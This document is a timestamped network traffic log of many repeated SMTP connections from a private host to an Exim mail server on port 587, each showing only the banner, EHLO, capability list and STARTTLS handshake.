Oct 1, 2024 06:17:51.409554005 CEST	587	50441	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:51.409674883 CEST	50441	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:51.573014975 CEST	587	50441	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:54.097789049 CEST	587	50442	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:53 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:54.105546951 CEST	50442	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:54.265378952 CEST	587	50442	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:54.265640974 CEST	50442	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:54.427282095 CEST	587	50442	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:56.925801992 CEST	587	50443	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:56 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:56.929655075 CEST	50443	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:57.128225088 CEST	587	50443	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:57.128382921 CEST	50443	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:57.618508101 CEST	587	50443	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:58.445426941 CEST	587	50444	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:58 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:58.445621014 CEST	50444	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:58.615875959 CEST	587	50444	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:58.616015911 CEST	50444	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:58.780188084 CEST	587	50444	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:01.232371092 CEST	587	50445	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:01 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:01.232580900 CEST	50445	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:01.405668020 CEST	587	50445	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:01.461915970 CEST	50445	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:01.626455069 CEST	587	50445	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:04.350436926 CEST	587	50446	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:04 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:04.350605011 CEST	50446	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:04.511722088 CEST	587	50446	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:04.511998892 CEST	50446	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:04.679335117 CEST	587	50446	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:07.148041010 CEST	587	50447	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:07 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:07.148164988 CEST	50447	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:07.308753014 CEST	587	50447	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:07.308900118 CEST	50447	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:07.471628904 CEST	587	50447	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:09.887931108 CEST	587	50448	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:09 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:09.888159990 CEST	50448	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:10.063348055 CEST	587	50448	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:10.063707113 CEST	50448	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:10.228682995 CEST	587	50448	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:12.739885092 CEST	587	50449	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:12 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:12.741672039 CEST	50449	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:12.910145998 CEST	587	50449	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:12.913681984 CEST	50449	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:13.083112001 CEST	587	50449	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:15.608010054 CEST	587	50450	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:15 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:15.608138084 CEST	50450	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:15.768373013 CEST	587	50450	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:15.768615007 CEST	50450	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:15.930072069 CEST	587	50450	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:18.755897999 CEST	587	50451	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:18 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:18.765099049 CEST	50451	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:18.924808979 CEST	587	50451	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:18.925031900 CEST	50451	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:19.087748051 CEST	587	50451	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:21.544050932 CEST	587	50452	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:21 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:21.544182062 CEST	50452	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:21.704247952 CEST	587	50452	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:21.704395056 CEST	50452	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:21.867134094 CEST	587	50452	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:24.548228979 CEST	587	50453	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:24 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:24.549719095 CEST	50453	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:24.713196039 CEST	587	50453	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:24.713695049 CEST	50453	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:24.888272047 CEST	587	50453	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:27.318272114 CEST	587	50454	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:27 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:27.318461895 CEST	50454	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:27.613176107 CEST	587	50454	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:27 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:27.767788887 CEST	587	50454	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:27.767929077 CEST	50454	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:27.928976059 CEST	587	50454	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:31.335994005 CEST	587	50455	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:31 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:31.336153984 CEST	50455	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:31.520083904 CEST	587	50455	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:31.520220995 CEST	50455	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:31.706887960 CEST	587	50455	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:34.294301987 CEST	587	50456	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:34 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:34.297724962 CEST	50456	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:34.457271099 CEST	587	50456	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:34.457717896 CEST	50456	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:34.919779062 CEST	587	50456	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:37.770266056 CEST	587	50458	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:37 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:37.770390987 CEST	50458	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:37.933619022 CEST	587	50458	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:37.933747053 CEST	50458	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:38.100075960 CEST	587	50458	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:40.578175068 CEST	587	50459	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:40 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:40.582283974 CEST	50459	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:40.746006012 CEST	587	50459	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:40.749789953 CEST	50459	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:40.914518118 CEST	587	50459	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:43.402789116 CEST	587	50460	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:43 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:43.402926922 CEST	50460	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:43.567401886 CEST	587	50460	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:43.567533970 CEST	50460	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:43.889168978 CEST	587	50460	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:50.472876072 CEST	587	50461	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:50 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:50.475761890 CEST	50461	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:50.637662888 CEST	587	50461	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:50.641761065 CEST	50461	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:50.808094025 CEST	587	50461	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:53.310276985 CEST	587	50462	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:53 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:53.310436964 CEST	50462	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:53.472721100 CEST	587	50462	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:53.472882986 CEST	50462	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:53.637108088 CEST	587	50462	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:56.023166895 CEST	587	50463	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:55 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:56.023293972 CEST	50463	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:56.188596010 CEST	587	50463	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:56.193660021 CEST	50463	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:56.355374098 CEST	587	50463	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:18:58.842197895 CEST	587	50464	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:18:58 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:18:58.864814997 CEST	50464	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:18:59.040874004 CEST	587	50464	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:18:59.047287941 CEST	50464	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:18:59.215416908 CEST	587	50464	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:01.682943106 CEST	587	50465	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:01 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:01.686400890 CEST	50465	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:01.861952066 CEST	587	50465	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:01.862096071 CEST	50465	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:02.028563023 CEST	587	50465	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:04.519846916 CEST	587	50466	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:04 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:04.520268917 CEST	50466	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:04.683254004 CEST	587	50466	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:04.683996916 CEST	50466	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:05.271802902 CEST	587	50467	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:05 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:05.271922112 CEST	50467	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:05.435592890 CEST	587	50467	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:05.435738087 CEST	50467	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:05.623204947 CEST	587	50467	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:08.086899996 CEST	587	50468	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:08 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:08.087049007 CEST	50468	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:08.247433901 CEST	587	50468	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:08.247744083 CEST	50468	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:08.409147978 CEST	587	50468	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:10.830327034 CEST	587	50469	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:10 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:10.831976891 CEST	50469	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:10.991481066 CEST	587	50469	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:10.991705894 CEST	50469	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:11.156604052 CEST	587	50469	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:13.638681889 CEST	587	50470	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:13 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:13.642355919 CEST	50470	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:13.802536011 CEST	587	50470	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:13.810476065 CEST	50470	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:13.973335981 CEST	587	50470	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:16.354511023 CEST	587	50471	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:16 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:16.359327078 CEST	50471	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:16.520011902 CEST	587	50471	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:16.529326916 CEST	50471	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:16.689106941 CEST	587	50471	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:19.142283916 CEST	587	50472	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:19 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:19.142472029 CEST	50472	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:19.302323103 CEST	587	50472	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:19.302495003 CEST	50472	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:19.463205099 CEST	587	50472	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:21.874402046 CEST	587	50473	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:21 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:21.874670029 CEST	50473	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:22.034171104 CEST	587	50473	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:22.034333944 CEST	50473	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:22.196963072 CEST	587	50473	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:24.539089918 CEST	587	50474	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:24 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:24.539248943 CEST	50474	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:24.705202103 CEST	587	50474	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:24.705444098 CEST	50474	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:24.871175051 CEST	587	50474	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:27.421005964 CEST	587	50475	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:27 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:27.421195984 CEST	50475	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:27.586102962 CEST	587	50475	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:27.586244106 CEST	50475	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:27.758476973 CEST	587	50475	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:28.808171988 CEST	587	50476	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:28 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:28.811871052 CEST	50476	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:19:28.982208014 CEST	587	50476	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:19:28.982460976 CEST	50476	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:19:29.162601948 CEST	587	50476	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:19:30.086498976 CEST	587	50477	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:19:29 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:19:30.086642981 CEST	50477	587	192.168.2.4	198.54.114.247	EHLO 760639
